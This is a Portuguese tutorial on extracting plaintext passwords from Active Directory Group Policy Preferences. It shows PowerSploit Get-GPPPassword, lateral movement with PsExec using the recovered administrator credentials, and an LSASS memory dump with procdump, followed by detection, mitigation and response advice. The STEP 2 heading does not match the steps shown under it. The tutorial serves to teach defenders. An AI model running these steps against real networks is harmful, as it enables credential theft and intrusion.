Ataque de Extração de Senha em Texto Simples

Tutorial de Ataque: Como Funciona um Ataque de Extração de Senha em Texto Puro

PASSO 1: Descubra senhas nas preferências de Group Policy

As preferências de Group Policy são armazenadas como arquivos XML na partilha SYSVOL nos controladores de domínio. A partilha SYSVOL é acessível aos Usuários Autenticados, então um adversário que tenha conseguido infiltrar-se na rede pode acessar seu conteúdo. Um adversário pode analisar esses arquivos XML manualmente, procurando por instâncias do atributo CPassword, que contém as senhas criptografadas. Atributos adjacentes fornecem outros detalhes, como o nome de usuário. Ou podem usar ferramentas como o cmdlet Get-GPPPasswords do PowerSploit para automatizar o processo de aquisição e descriptografia dessas senhas, conforme mostrado abaixo.

      PS> Import-Module PowerSploit

PS> Get-GPPPassword

Changed : {2020-08-17 11:14:01}

UserNames : {Administrator (built-in)}

NewName : [BLANK]

Passwords : {WhatAGreatPassword123!}

File : \\domain.com\SYSVOL\domain.com\Policies\{5AC5C2A3-B893-493E-B03A-D6F9E8BCC8CB}\Machine\Preferences\Groups\Groups.xml

PS>
      

PASSO 2: Modificar a ACL do AdminSDHolder

Agora que o adversário possui o nome de usuário e senha de um administrador local, ele pode enumerar os computadores no Active Directory nos quais a Política de Grupo é aplicada, o que lhes fornece uma lista de computadores aos quais podem se autenticar usando essas credenciais. Com esta lista, o adversário pode continuar a expandir sua presença dentro da organização. Neste exemplo, o adversário se conecta a outro computador e cria um despejo de memória do processo LSASS.exe para possibilitar movimentos laterais ou escalonamento de privilégios adicionais.

      PS> [XML] $XML = Get-GPO -Guid 5AC5C2A3-B893-493E-B03A-D6F9E8BCC8CB | Get-GPOReport -ReportType Xml

PS> $XML.GPO.LinksTo

SOMName SOMPath Enabled NoOverride

------- ------- ------- ----------

Comp domain.com/Comp true false

PS> $DN = Get-ADOrganizationalUnit -filter { Name -eq $XML.GPO.LinksTo.SOMName } | Select -expand DistinguishedName

PS> Get-ADComputer -filter "*" -SearchBase $DN

DistinguishedName : CN=Server1,OU=Comp,DC=domain,DC=com

DNSHostName :

Enabled : True

Name : Server1

ObjectClass : computer

ObjectGUID : 4eeec15e-ee84-4195-b5c8-ee4d5d67efbf

SamAccountName : SERVER1$

SID : S-1-5-21-5840559-2756745051-1363507867-16924

UserPrincipalName :

PS> .\PSExec.exe -u Administrator -p WhatAGreatPassword123! \\server1 powershell.exe

PsExec v2.2 - Execute processes remotely

Copyright (C) 2001-2016 Mark Russinovich

Sysinternals - www.sysinternals.com
PS> procdump.exe -accepteula -r -ma lsass.exe lsass.dmp

PS>
      

Detectar, Mitigar e Responder

Detectar

Dificuldade: Baixa

Devido ao grande volume de operações de leitura que ocorrem em operações normais, não é possível detectar diretamente o acesso de um adversário a esses arquivos. No entanto, é possível realizar uma auditoria de senhas embutidas nas Preferências de Política de Grupo usando as mesmas técnicas que um adversário utilizaria. Usar o cmdlet Get-GPPPassword contra cada domínio irá enumerar as senhas embutidas (note que isso também revelará a senha em texto claro). Alternativamente, o seguinte trecho de PowerShell enumerará as senhas embutidas sem descriptografá-las:

      # Replace this path with the path to SYSVOL to check

$SYSVOL_Path = "\\domain.com\sysvol"

Get-ChildItem $SYSVOL_Path -Recurse -File | Select-String -Pattern "cpassword"

# Sample Output using \\domain.com\sysvol

\\domain.com\sysvol\domain.com\Policies\{5AC5C2A3-B893-493E-B03A-D6F9E8BCC8CB}\Machine\Preferences\Groups\Groups.xml:2:<Gro

ups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}"

name="Administrator (built-in)" image="2" changed="2020-08-17 11:14:01"

uid="{EA0FCA83-45D2-4189-B476-DB595FB29E2D}"><Properties action="U" newName="" fullName="" description="Built-in Local

Admin" cpassword="Pe81R/eXjjPtd5oJw6D0hifqz78ezVt7tD0ViS9eTg+z2dKIvfwMRbD5JPFEA26i" changeLogon="0" noChange="0"

neverExpires="0" acctDisabled="0" subAuthority="RID_ADMIN" userName="Administrator (built-in)"/></User>
      

Mitigar

Dificuldade: Baixa

Resumidamente, todas as senhas embutidas nas preferências de Group Policy devem ser removidas. Adicionalmente:

• Garanta que todos os controladores de domínio estejam executando versões atuais do sistema operacional com as últimas atualizações, pois as versões atuais do Windows Server não permitem a incorporação de senhas nas preferências de Política de Grupo.
• Substitua o uso das preferências de Política de Grupo para definir a senha da conta de administrador local integrada por uma solução robusta como a da Microsoft, a Local Administrator Password Solution (LAPS).
• Adote soluções que substituem senhas embutidas por consultas dinâmicas autenticadas.

Responder

Dificuldade: Baixa

Caso descubra senhas embutidas nas preferências de Group Policy, as seguintes ações podem ser tomadas:

• Remova a senha embutida na preferência de Política de Grupo.
• Redefina a senha para a conta.